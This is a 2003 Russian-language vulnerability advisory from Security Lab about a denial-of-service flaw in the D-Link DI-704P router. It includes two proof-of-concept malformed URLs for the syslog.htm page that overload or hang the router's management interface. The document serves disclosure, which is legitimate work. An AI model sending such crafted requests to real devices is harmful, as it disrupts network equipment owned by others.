Security Lab

DoS против D-Link DI-704P Router

Дата публикации:03.06.2003
Всего просмотров:1468
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Отказ в обслуживании обнаружен в D-Link DI-704P Router. Удаленный авторизованный пользователь может завесить работу управляющего интерфейса.

Удаленный авторизованный пользователь может послать специально сформированный URL к управляющему интерфейсу маршрутизатора, чтобы нарушить работу устройства. Следующий URL заставит устройство выполнить DNS запрос:

 
http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Результат DNS запроса будет следующий:
 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@xxxx.xx.comcast.net
Если представлено несколько подобных URL запросов, временный отказ в обслуживании произодет на маршрутизаторе.

Следующий тип URL завесит управляющий интерфейс маршрутизатора, пока он не будет перезагружен: (работа маршрутизатора не нарушится):

http://192.168.0.1/syslog.htm?
D=............................. ............................................
...........................................................................
............................................... ............................
...........................................................................
............................................................... ............
...........................................................................
...........................................................................
.. .........................................................................
...........................................................................
.................. .........................................................
....................
Уязвимость обнаружена в D-Link DI-704P
Ссылки: Buffer Overflow? Local Malformed URL attack on D-Link 704p router